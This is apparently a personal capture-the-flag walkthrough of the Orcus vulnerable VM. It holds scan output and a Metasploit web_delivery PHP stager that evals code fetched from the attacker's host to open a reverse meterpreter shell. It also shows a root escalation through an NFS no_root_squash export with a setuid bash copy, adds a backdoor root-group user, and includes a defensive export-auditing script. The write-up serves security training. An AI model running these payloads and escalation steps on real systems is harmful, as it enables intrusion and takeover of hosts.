CTF Orcus from Viper (hackfest 2016)

Hello guys, this is my third vulnerable VM by @ViperBlackSkull. If you need more information you can reach me on Twitter at @marghost. You can get the virtual machine HERE. So let's get started.

This VM is tagged as hard, and it is! First I ran nmap:

root@kali:~# nmap -T4 -A -v 192.168.1.21
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT
Discovered open port 443/tcp on 192.168.1.21
Discovered open port 143/tcp on 192.168.1.21
Discovered open port 139/tcp on 192.168.1.21
Discovered open port 995/tcp on 192.168.1.21
Discovered open port 22/tcp on 192.168.1.21
Discovered open port 993/tcp on 192.168.1.21
Discovered open port 445/tcp on 192.168.1.21
Discovered open port 80/tcp on 192.168.1.21
Discovered open port 111/tcp on 192.168.1.21
Discovered open port 53/tcp on 192.168.1.21
Discovered open port 110/tcp on 192.168.1.21
Discovered open port 2049/tcp on 192.168.1.21

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp   open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      40370/tcp  mountd
|   100005  1,2,3      54899/udp  mountd
|   100021  1,3,4      32978/tcp  nlockmgr
|   100021  1,3,4      55763/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OK, so in summary we have a web server, an RPC server with NFS (and maybe an accessible export), two SSH servers (which is odd), and a Samba server.

The next step is to run nikto against this server and see what is going on.

root@kali:~# nikto -h 192.168.1.21
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2017-03-22 16:44:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-22 16:44:26 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Soooo we have some portal and phpMyAdmin installed. We will look at robots.txt and the readme/changelog/license files on the server.

robots.txt does not help. The readme/license files tell us that we have an install of Exponent CMS, and from the changelog we learn that it is version 2.3.9.
A quick exploit search says it is vulnerable to SQL injection, but when I went to index.php and tried a few, they did not work; I also saw that the portal reports the DB is offline, so it is a dead end.
The phpMyAdmin default login does not work. I searched the other directories that nikto revealed and found nothing interesting.

So, as the creator of the VM invites us to do extended enumeration, I will try some other information-gathering tools.

For enumeration's sake I will use the enum4linux tool to see what I can get.

root@kali:~# enum4linux -a -o -n -v 192.168.1.21
Target ........... 192.168.1.21
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.21 |
====================================================
[V] Attempting to get domain name with command: nmblookup -A '192.168.1.21'
[+] Got domain/workgroup name: WORKGROUP

============================================
| Nbtstat Information for 192.168.1.21 |
============================================
Looking up status of 192.168.1.21
ORCUS <00> - B <ACTIVE> Workstation Service
ORCUS <03> - B <ACTIVE> Messenger Service
ORCUS <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.1.21 |
=====================================
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 192.168.1.21 allows sessions using username '', password ''

===========================================
| Getting domain SID for 192.168.1.21 |
===========================================
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 192.168.1.21 -c 'lsaquery' 2>&1
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
| OS information on 192.168.1.21 |
======================================
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 192.168.1.21 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '192.168.1.21' 2>&1
[+] Got OS info for 192.168.1.21 from srvinfo:
ORCUS Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

=============================
| Users on 192.168.1.21 |
=============================
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '192.168.1.21' 2>&1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '192.168.1.21' 2>&1
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]

=========================================
| Share Enumeration on 192.168.1.21 |
=========================================
[V] Attempting to get share list using authentication
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Orcus server (Samba, Ubuntu))

Server Comment
--------- -------
ORCUS Orcus server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP ORCUS

[+] Attempting to map shares on 192.168.1.21
[V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'print$' -U''%'' -c dir 2>&1
//192.168.1.21/print$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'IPC$' -U''%'' -c dir 2>&1
//192.168.1.21/IPC$ Mapping: OK Listing: DENIED

====================================================
| Password Policy Information for 192.168.1.21 |
====================================================
[V] Attempting to get Password Policy info with command: polenum '':''@'192.168.1.21' 2>&1
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.21 |
==============================
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] User "administrator" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] User "guest" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] User "krbtgt" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] User "domain admins" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[I] Found new SID: S-1-5-21-2160833340-863236869-394548843
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[I] Found new SID: S-1-22-1
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c lsaenumsid 2>&1
[V] Processing SID S-1-5-32-550
[I] Found new SID: S-1-5-32
[V] Processing SID S-1-5-32-548
[V] Processing SID S-1-5-32-551
[V] Processing SID S-1-5-32-549
[V] Processing SID S-1-5-32-544
[V] Processing SID S-1-1-0
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username '', password ''
S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User)
S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group)
S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User)
S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)

So we have basic access to Samba and RPC, and with those we find the users viper and root. We also found the user kippo when enumerating user SIDs. It looks like a manga name; I may investigate this.

Dirb with the big dictionary is my next step.

root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Mar 22 17:16:24 2017
URL_BASE: http://192.168.1.21/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.21/ ----
==> DIRECTORY: http://192.168.1.21/FCKeditor/
+ http://192.168.1.21/LICENSE (CODE:200|SIZE:15437)
==> DIRECTORY: http://192.168.1.21/admin/
==> DIRECTORY: http://192.168.1.21/backups/
==> DIRECTORY: http://192.168.1.21/cron/
==> DIRECTORY: http://192.168.1.21/external/
==> DIRECTORY: http://192.168.1.21/files/
==> DIRECTORY: http://192.168.1.21/framework/
==> DIRECTORY: http://192.168.1.21/install/
==> DIRECTORY: http://192.168.1.21/javascript/
==> DIRECTORY: http://192.168.1.21/phpmyadmin/
+ http://192.168.1.21/robots.txt (CODE:200|SIZE:1347)
+ http://192.168.1.21/server-status (CODE:403|SIZE:300)
+ http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113)
==> DIRECTORY: http://192.168.1.21/themes/
==> DIRECTORY: http://192.168.1.21/tmp/
+ http://192.168.1.21/webalizer (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.21/zenphoto/

---- Entering directory: http://192.168.1.21/FCKeditor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.21/install/ ----
==> DIRECTORY: http://192.168.1.21/install/changes/
==> DIRECTORY: http://192.168.1.21/install/files/
==> DIRECTORY: http://192.168.1.21/install/images/
==> DIRECTORY: http://192.168.1.21/install/include/
==> DIRECTORY: http://192.168.1.21/install/pages/
==> DIRECTORY: http://192.168.1.21/install/popups/
==> DIRECTORY: http://192.168.1.21/install/samples/
==> DIRECTORY: http://192.168.1.21/install/upgrades/

---- Entering directory: http://192.168.1.21/javascript/ ----
==> DIRECTORY: http://192.168.1.21/javascript/jquery/

---- Entering directory: http://192.168.1.21/phpmyadmin/ ----

---- Entering directory: http://192.168.1.21/zenphoto/ ----
+ http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205)
==> DIRECTORY: http://192.168.1.21/zenphoto/albums/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/
==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/
+ http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471)
==> DIRECTORY: http://192.168.1.21/zenphoto/themes/
==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/
---- Entering directory: http://192.168.1.21/zenphoto/zp-core/ ----
+ http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/
+ http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/
DOWNLOADED: 1575266 - FOUND: 13

I cleaned it up a little and some interesting things were found. The zenphoto directory is an app that lets users upload images, which is interesting for a web_delivery attack. There is a backups directory that nikto didn't find the first time, and some interesting things are there: SSH credentials that I can't download for now, and a zipped file. Let's download it. There is a db_conn.php file that contained:

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

So next I will try to log in to zenphoto. In zenphoto I did the setup and everything worked out fine; I could upload a PHP web_delivery stager and access it via the /zenphoto/albums/ directory.
This is how I made the web_delivery exploit with metasploit:

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
set uripath v9HL33yWdUR4KFo
run

I created a webdelivery.php file and filled it like this:

<?php
eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo'));
?>

Then I zipped it and uploaded it with zenphoto. It worked like a charm: when I went to /zenphoto/albums/ I found my webdelivery.php file. I just opened it, and metasploit then tells you a session has opened; just interact with it, run the shell command and load bash.

sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'

Now I have terminal access 😀

And BAM the first flag!

[*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5753 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www
www-data@Orcus:/var/www$ ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4

Next I ran linuxprivchecker to search for an escalation exploit.

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod +x linuxprivchecker.py
python ./linuxprivchecker.py

I found that the MySQL server was vulnerable, BUT secure_file_priv is set, so there is no chance to exploit raptor_udf2 with dbuser.

git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

Nothing to be found here either.

git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
./LinEnum.sh

The first thing I saw was .youwillfindnothinghere, and I was thinking MEH, maybe, but nooo.

cd /home/.youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls
ls
itoldyou
www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou
cat itoldyou

PFFFF

But LinEnum found something useful:

NFS config details: 
-rw-r--r-- 1 root root 415 Oct 18 19:56 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)

OH yeah, no_root_squash. That means if I, as root on my own machine, write a file to the export, its owner is not downgraded to nobody; it stays root. This can be used to escalate privileges!!

First, on Kali you need to install nfs-common (wtf Kali).

showmount -e 192.168.1.21
Export list for 192.168.1.21:
/tmp *

As expected.

mount -t nfs 192.168.1.22:/tmp /tmpvictim -o nolock

On the VM:

cp /bin/bash /tmp/bash

From Kali:

cp /tmpvictim/bash /tmpvictim/vulnbash

chmod 4777 vulnbash

Back on the VM, just execute:

vulnbash -p

Yes sir, we got root, but to make it more stable I will create a user and log in over SSH.

openssl passwd -crypt test
SSybfm7a0XqFo
useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot
usermod -aG sudo groot
root@kali:/tmpvictim# ssh groot@192.168.1.22
groot@Orcus:/$ id
uid=1007(groot) gid=0(root) groups=0(root),27(sudo)
groot@Orcus:/$ sudo su
sudo: unable to resolve host Orcus
root@Orcus:/# id
uid=0(root) gid=0(root) groups=0(root)
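The /etc/exports finding that LinEnum printed and the setuid-copy trick that followed both come down to two checks a defender can run: does an export line combine rw, a wildcard client and no_root_squash, and has a root-owned setuid binary appeared inside an exported directory. The script below is an added example written for this writeup, not code from the post or from the VM author; the only value taken from the page is the `/tmp *(rw,no_root_squash)` line, and the other sample export lines, the `SAMPLE_EXPORTS` name and the `owner_uid` parameter (so the scan can be exercised without root) are constructed for illustration.

```python
import os
import re
import stat
import tempfile


def parse_exports(text):
    """Parse /etc/exports syntax into (path, client, options) tuples.

    Comments and blank lines are skipped; a path with no client list is
    treated as exported to '*' with default options.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        if not clients:
            entries.append((path, "*", set()))
            continue
        for client in clients:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", client)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, host, opts))
    return entries


def audit_exports(text):
    """Return (severity, path, host, sorted options) for risky export lines."""
    findings = []
    for path, host, opts in parse_exports(text):
        squash_off = "no_root_squash" in opts
        world = host == "*"
        writable = "rw" in opts
        if squash_off and world and writable:
            sev = "CRITICAL"   # exactly the /tmp *(rw,no_root_squash) case
        elif squash_off:
            sev = "HIGH"       # a trusted client's root still writes as uid 0
        elif world and writable:
            sev = "MEDIUM"     # anyone can write, but root is squashed to nobody
        else:
            continue
        findings.append((sev, path, host, sorted(opts)))
    return findings


def find_setuid(directory, owner_uid=0):
    """Return regular files under `directory` that are setuid and owned by owner_uid.

    A root-owned setuid copy of a shell inside a world-writable export is the
    artefact this technique leaves behind. owner_uid is a parameter (assumed
    helper, not part of the post) so the scan can be tested without root.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode)
                    and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                hits.append(full)
    return sorted(hits)


# First export line is the one LinEnum printed on Orcus; the other two are
# constructed samples that should not be flagged.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,no_root_squash)
/srv/homes hostname1(rw,sync,no_subtree_check)
/srv/pub *(ro,sync)
"""

if __name__ == "__main__":
    for sev, path, host, opts in audit_exports(SAMPLE_EXPORTS):
        print(f"{sev}: {path} exported to {host} with {','.join(opts)}")
    # Constructed demo of the setuid scan: plant a file, mark it setuid, scan.
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "vulnbash")
        open(planted, "w").close()
        os.chmod(planted, 0o4755)
        print("setuid files owned by me:", find_setuid(d, owner_uid=os.getuid()))
```

On a real host you would feed `audit_exports` the contents of /etc/exports and run `find_setuid` over each exported path with the default `owner_uid=0`; mounting exports with `nosuid` on the client side, or dropping `no_root_squash` on the server, removes the condition the CRITICAL finding describes.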

Second flag

root@Orcus:~# cat flag.txt
807307b49314f822985d0410de7d8bfe

I found what makes this VM unique. After some searching for the user kippo I found earlier, it turns out to be the user used by the kippo honeypot. Neither of the last two machines had a honeypot! So I am going to investigate to find a flag there.

Third flag, which I found by poking around:

root@Orcus:/etc/kippo# cd data
root@Orcus:/etc/kippo/data# ls
userdb.txt
root@Orcus:/etc/kippo/data# cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

AND it's done!

M.
